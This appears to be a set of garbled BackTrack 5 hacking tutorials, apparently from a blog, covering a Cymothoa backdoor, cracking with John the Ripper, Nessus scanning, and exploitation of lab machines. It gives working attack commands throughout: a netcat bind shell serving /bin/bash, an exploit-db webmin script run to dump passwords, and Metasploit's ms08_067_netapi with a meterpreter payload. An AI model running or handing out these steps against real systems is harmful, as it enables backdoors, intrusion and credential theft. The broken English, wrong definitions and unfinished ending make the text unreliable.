THE USE BACKDORING CYMOTHOA WITH NC PART 1

to install bakdoring cymonthoa in ubuntu, there are some that we must perhatukan:
1. open virtualbox and run ubuntu
2. connect ubuntu to backtrack
3. open a terminal in backrack continue to runcymonthoa open in the root continues to selectand choose backdor pentes lulu cymonthoadouble click.

after that is not terminal in ubuntu and runcymontoa with the command # ps ax.

if confused could typing the command nc-h

- H (help), the picture is as follows:

I get the port from nessus by 5353.

open a terminal and then type the command nc-l-p 5353 -e > cy /bin/bash

the picture is as follows:

THANK FOR YOU ALL.

JHON THE RIPER

We try to mencrack a password using John the Ripper.
commands that can be used as follows:
1. open the application john the ripper onbacktrack.
    example image jonh the ripper application.

root@bt:/pentest/passwords/john# ls -l

This command is used to display the commands that are in the john the ripper

root@bt:/pentest/passwords/john# john -si cari.txt

This command is used to display the passwordthat we get to the db earlier exploits, but the password I save with the name "search" and theshape of "txt".

after appearing in the picture above do not forget to pay attention because there are 5 files areunreadable. please try to open a command. johnthe ripper.

THANK FOR ALL.

PRIVALLAGE ESCALATION

Privallage Escalation = is a technique to go in and take the access of others.

So to do Privillage prefication in Ip address192.168.0.21. There are things we haveperhatiakan:
1. seeking information sitarget
2. looking for a system that runs on the target
3. look for weaknesses of the target
4. take over or enter kesistem sitarget.

The steps are as follows:
1. Finding Information The target can use some of the applications used by Backtrack 5 are:
    - Information and select the network scaninggetharing and please select which one you     

      want. Sample images using zenmap application:

2. After various information by using folderselanjuntx cents we look for any system that runs
    on IP 192.168.0.21 example image of the road system as follows:

3. Next we see what is running on IP address192.168.0.21 next we will look for flaws of the 
    system by using nessus. Sample images for spaces with nessus:

These images enter our loginusing nessus

This image will appear after you click the + addscan, after that we enter a name = local instanceand enter the target IP = 192.168.0.21 Example

This image appears above if we succeedscaning 192.168.0.21 and then click the report todisplay the results and click to find vulnernyalocal.

This picture above I try to click on local us a lot ofthat comes slanting please search vulnernya. sshfor example, we click it there are many systemsthat are running and there is a high-level system

4. Okay now we mengexplotasi terserbut because the condition already muncukupi for 

    exploitable.Here we can use or exploit msf console-db.These few examples of the   

    picture:

image above the preview imageexploit db

with this command can be seen that we can usewhat commands root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin

with the command below we see the results as follows

root@bt:/pentest/exploits/exploitdb# ls

with the command below we see the results as follows

root@bt:/pentest/exploits/exploitdb# cat platforms/multiple/remote/2017.pl  

with the command below we see the results as follows: results from port 10000 to the webmin

root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl  

with this command we see all the passwords, user, login etc..

root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000

EXPLOTATION WINDOWS XP USING METASPLOIT

First we do is open your next click startvirtualbox, but must first pay attention to the commands diwindows xp.

This command to using
1. Open VirtualBox
2. Blok Windows Xp and the next klik Start
    after you click start to emerge image around likethis.

3. The next clik start and seleck  Cmd, after that write "ipconfig" for to conection. after you   
    click start to emerge image around likethis.

4. after typing the command "ipconfig" will appearbelow the image if successful and are then     
    typing the command ping by IP 192,168.43.1. Ip isdidiambil from ipconfig and eventually   
    replacedwith the number 1.

5. The next open terminal Backtrack and write ping 192.168.43.128. This Ip  is taken from 
    windows xp.

after the connection was successful then we seekinfomati directly on windows. much cansigunakan to find out the windows. Eg can use(nmap, zenmap, and outoscan), but I mengunaknzenmap to know that there diwondows info.
This command to using
1. Open Apps in Backtrack
2. information Gathering
3. Network Analysis
4. Network Scanner
5. Clik Zenmap
    examples like this picture after we open the command zenmab.

6. The next write in target Ip 192.168.43.128. The results are as shown below when itdimemasukkan target IP.

after we get our information and systems serveselansutnya we find the gap.
1. write /etc/init.d/nessusd start to run nessus
2. Open localhost:8834
    if brewed the way we live successfully nessusscan click then click add and enter your 
    name and the target that you want to go.

3. lacn next scan will appear asgamber image below.

4. The next clik repots will appear asgamber image below

5. clik IP 192.168.43.128, the next appears many ports etc..

    I choise udp and apperas network time protokol (NTP)

Synopsis: An NTP server is listening on the remote host.

Description

An NTP (Network Time Protocol) server is listening on this port.  It

provides information about the current date and time of the remote

system and may provide system information.

Solution

n/a

Risk Factor: None

Plugin Publication Date: 2002/03/13

Plugin Last Modification Date: 2011/03/11

next we find with metasploit.

commands that do dimetasploit are as follows:

1.root@bt:~# msfconsole

2. msf > use windows/smb/ms08_067_netapi

3. set payload windows/meterpreter/bind_tcp

4. set rhose 192.168.43.128

5. exploit

These few examples of the image if it is run inmetasploit.

GOOD LUCK FOR MY FRENDS

vulnerbility assegment using nessus and explotation

SCANING USING NESSUS.


First thing to do is run the nessus
1. open a terminal and type this command
    root@bt:~# /etc/init.d/nessusd start

2. open your browser after it write localhost: 8834
    This is the preview image to open:

3.after that click on the image tohttp://120.0.0.1:8834 and it tampilanya after weclick.

4. after that wait and enter usernamenya and alsopasswornya. this drawing.

5.The next image will appear directly diwah ya justclick ok.

6.The next image will appear below ya please select scan.

7. The next image will apper below please Klik / select add.

after you click add, we are asked to put name,(name your sterserah) and this picture

8. please enter
    name: fitri (for example) and enter the target IPthat we want. The next type in the IP that   

     we were going terscan automatically. picture will emerge after this scan. to find  

    outwhere  the irreproachable disutu pick.

  GOOD LUCK FOR YOU ALL.

EXPLOITATION.

you please go through theapps Backtrack

1. Select Explotation Tools

2. The next Select Open Source Explotation

3. The next Select Exploit-DB

4. The next Select Exploitdb search

     After you open exploitdb search, and this samplepicture

5. next you can type. / smb searchsploit, after youtype the above command will show a picture 

   likethis.

6. didalm command. / smb searchsploit,possessed many Silah command will read and follow  

    the commands in the command with a command yangmkita can also make.

Good luck hopefully get a new experience  amen

HOW TO INSTALL NESSUS

how to install Nessus tools:
first of all I download these tools at the address http://www.tenable.com/products/nessus/nessus-download-agreement
After that we will start the install program of this nexus,
Click 2 times the program has been downloaded earlier

Click the install page,,,
after the install

after that we click install will appear as shownbelow.

just to be here.to be continue.